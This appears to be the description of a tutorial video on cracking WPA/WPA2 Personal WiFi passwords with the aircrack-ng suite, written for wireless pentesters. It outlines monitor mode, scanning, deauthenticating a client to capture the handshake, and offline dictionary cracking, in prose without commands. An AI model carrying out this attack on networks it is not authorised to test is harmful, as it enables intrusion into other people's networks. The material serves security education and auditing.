WiFi Episode 1: How to Hack WPA and WPA2 Personal Networks (The Basics)

Every wireless pentester has to start somewhere. This is that somewhere.

Before you worry about WPA3, enterprise attacks, rogue APs, or EAP-TLS — you need to genuinely understand why WPA2 Personal is fundamentally broken by design. Not just that it can be cracked. But why it can be, and exactly what’s happening at each step when it is.

That understanding is what separates people who follow tutorials from people who actually know what they’re doing.

What’s happening in this video

This is a full walkthrough of cracking a WPA/WPA2 PSK using the aircrack-ng suite — the standard toolkit for wireless testing that’s been baked into BackTrack and Kali Linux for years.

Here’s the attack flow, step by step:

1. Monitor mode

First, the Alfa AWUS036H USB WiFi adapter gets put into monitor mode. This is the foundation of everything in wireless pentesting — without monitor mode, your adapter only sees traffic addressed to it. In monitor mode, it sees everything in range. If you’re new to this, getting comfortable with your adapter and drivers before anything else is time well spent.

2. Scanning with airodump-ng

With monitor mode enabled, airodump-ng is used to scan for WiFi traffic on channel 6. This is where you gather the information you need: the target BSSID, the channel it’s broadcasting on, and — critically — whether there are any associated clients. No clients, no handshake. That’s the constraint.

3. The deauthentication attack

Once an associated client is found, aireplay-ng is used to send a deauthentication packet to it. The idea is simple: force the client off the network so it has to reconnect. When it does, the four-way WPA handshake happens — and that’s what you’re capturing.

This is the bit that surprises most people when they first learn it. You’re not breaking the encryption. You’re capturing the material that proves the client knows the password, then working on that offline.

4. Cracking the PSK

With the handshake captured, airodump-ng is stopped and aircrack-ng is run against it using a dictionary. In this demo, the example wordlist that ships with aircrack-ng is used. In the real world, you’d use something like rockyou.txt — and you’d be surprised how often that’s enough.

The important takeaway

The attack works because WPA2 Personal is a shared secret system. Everyone on the network uses the same pre-shared key. If you can capture the handshake and you have the password in your wordlist, you’re in. The strength of the network is entirely dependent on the strength of the passphrase — and most people are terrible at choosing strong passphrases.

This is exactly why enterprises don’t rely on WPA2 Personal. And why, when you see it during a real engagement, it’s worth spending time on.

Get the handshake first. Worry about cracking it after.